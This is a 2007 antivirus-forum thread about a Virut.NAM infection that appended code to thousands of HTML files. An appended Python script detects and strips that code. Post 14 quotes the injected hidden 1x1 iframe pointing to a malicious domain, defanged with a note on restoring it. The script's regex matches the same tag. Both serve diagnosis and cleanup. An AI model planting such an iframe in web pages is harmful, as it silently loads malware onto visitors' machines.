Virut.NAM

Discussion in 'NOD32 version 2 Forum' started by marky9074, Oct 17, 2007.

Thread Status:
Not open for further replies.
  1. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Virut.NAM [solved]

    Hi there,

    Posted in a couple of other threads about this, but see after a search there is not any information and started a new thread.

    I found this last night and after a complete Nod32 scan it seems like it wants to delete 13728 html files...

    I rebooted into a PE shell and the files looked OK, so assumed they could be cleaned.

    Installed Kaspersky this morning which has gone through and disinfected the files, and reports that all is well...

    Nod32 however is now reporting that there are still 10000+ infected files.

    Kaspersky says it is all OK....

    So, I am at a loss what to do...

    I've only seen two references on this, one the same as me, but a restore fixed him ok. The other was a mention on how this virus 'slipped under the Nod32 radar'.

    I have ten years plus work backed up to removable disks, and ghost images, of which it appears they are all infected...

    Any help would be much appreciated.

    Mark
     
    Last edited: Oct 19, 2007
  2. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Hi there, the Virut family of viruses uses polymorphism to hide from all antivirus protection; it infects executable files. File infection makes it very hard to repair a system that has been infected. I would strongly recommend rebuilding the system from backups.

    Windows can be rebuilt as described in the following link: http://www.informationweek.com/showArticle.jhtml?articleID=189400897 or failing this a format of the system will be required.

    Cheers :D
     
  3. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    But I don't understand...the only thing that has been affected is html files? My system is OK, I have a backup of that at various stages, it is just my data. Basically every html file on my disk is being flagged as a virus...

    Can I submit one of these files to Eset?

    Every backup I have of my 'data' has got these flagged changed files.
     
  4. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Virut is very nasty. I have seen it to modify a lot of files into malware.
    Did you try to upload some of these files to Jotti or VirusTotal to see what other AVs say about them?
     
  5. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    This is on a Vista Ultimate installation with Nod32, Spybot S&D, Ad-Aware etc. The system is always clean, as I restore the ghost image, install MS updates, and AV definitions, then backup again.
     
  6. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
  7. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    Sorry as I have no other ideas ATM.
     
  8. i_kenefick

    i_kenefick Registered Member

    Joined:
    Nov 29, 2005
    Posts:
    135
    Location:
    Cork, Ireland.
    Back up files, reinstall Windows. I think this is the only recommended action at this time.
     
  9. aigle

    aigle Registered Member

    Joined:
    Dec 14, 2005
    Posts:
    11,047
    Location:
    Saudi Arabia/ Pakistan
    ya! I think so.
     
  10. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    There is nothing wrong with Windows, it is a clean install that has been restored from a ghost image. It is my data that needs to be recovered...these are already corrupt. I couldn't care less about Windows, it's retrieval of my html files that is paramount...
     
  11. Jdeane

    Jdeane Eset Staff

    Joined:
    Jul 18, 2007
    Posts:
    82
    Location:
    UK
  12. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Cheers Jon,

    Just got a reply from Eset....
     
  13. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Sent some files to Eset...

    Just to clarify the above, Kaspersky only fixed about 3000 of the 13000 reported threats. I did run BitDefender as well, but that only pulled out a handful as well.

    Of all the products I have tried, Nod32 is actually reporting the most infections, so in all honesty it probably is the better product. It's just a shame it did not detect it at source when it arrived....

    I have had a bullet proof system for years now, and it is a real pain this happening. I guess having it bullet proof has meant that I have become complacent with regular scans etc. Saying that though it would not have made any difference if it was already infected.

    Can anyone elaborate on the 'went under the radar comment'? Sounds like it was some time before this was added to the definitions list...

    Thanks everyone for your help. Have sent some more files to Eset....hopefully they will come up with something, or will have to start seeing what I have backed up to DVD....

    It appears backing up to removable disks is not such a good idea after all! Shame I don't have a spare 3592 drive knocking around LOL!

    Mark
     
  14. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    Just had a reply from the very helpful Dan @ Eset.

    He says that this appends the following to html files...

    <iframe src="hxxp://ntkrnlpa.info/cr/?i=1" width=1 height=1></iframe>

    Replacing the xx with tt of course!

    After checking my files, it is indeed this. I have asked if there is a simple fix to this, but it's looking good...!

    Mark
     
  15. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
  16. Niklass

    Niklass Registered Member

    Joined:
    Sep 12, 2007
    Posts:
    11
    Location:
    Buenos Aires, Argentina

    Do you know what this script does? :eek:
     
  17. marky9074

    marky9074 Registered Member

    Joined:
    Oct 16, 2007
    Posts:
    15
    The iframe element creates an inline frame (in html code) that contains another document
     
  18. ossie686

    ossie686 Registered Member

    Joined:
    Oct 28, 2007
    Posts:
    1
    Hi Mark,

    I am new to this forum, please excuse my ignorance.

    I have the same problem with the iframe you mentioned, being inserted into all the html, asp and php files.
    After you have performed the search/replace on all the affected htm, asp and php files, did it completely resolve your problem?

    Ossie
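
The search/replace cleanup that posts 14 and 18 refer to, as an added example that is not code from the thread or from Eset: it reports, and optionally strips, the quoted iframe from htm, html, asp and php files. The exact regex, the function names and the `.infected.bak` backup suffix are assumptions; only the tag and domain come from post 14.

```python
from __future__ import annotations

import re
import shutil
from pathlib import Path

# Matches the tag quoted in post 14 (domain and width=1/height=1 from the thread).
# Accepting both the live and the defanged "hxxp" scheme is an assumption.
INJECTED = re.compile(
    rb'<iframe\s+src="?h(?:tt|xx)p://ntkrnlpa\.info/[^"\s>]*"?'
    rb'\s+width=1\s+height=1\s*>\s*</iframe>',
    re.IGNORECASE,
)
# File types named in the thread (post 18).
EXTENSIONS = {".htm", ".html", ".asp", ".php"}


def strip_injected(data: bytes) -> tuple[bytes, int]:
    """Return (cleaned bytes, number of injected iframes removed)."""
    return INJECTED.subn(b"", data)


def clean_tree(root: Path, apply: bool = False) -> dict[Path, int]:
    """List files carrying the iframe; rewrite them only when apply=True.

    Works on bytes so the page encoding and line endings are untouched.
    Before a rewrite the original is copied to <name>.infected.bak.
    """
    hits: dict[Path, int] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        cleaned, count = strip_injected(path.read_bytes())
        if count == 0:
            continue
        hits[path] = count
        if apply:
            shutil.copy2(path, path.with_name(path.name + ".infected.bak"))
            path.write_bytes(cleaned)
    return hits


if __name__ == "__main__":
    import sys
    # Dry run by default: print what would be changed under the given folder.
    for hit, n in clean_tree(Path(sys.argv[1])).items():
        print(f"{n} injected iframe(s): {hit}")
```

Run the dry run first and compare the count with what the scanner reports. This only removes the appended tag from data files; infected executables are a separate matter, as post 2 notes.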
     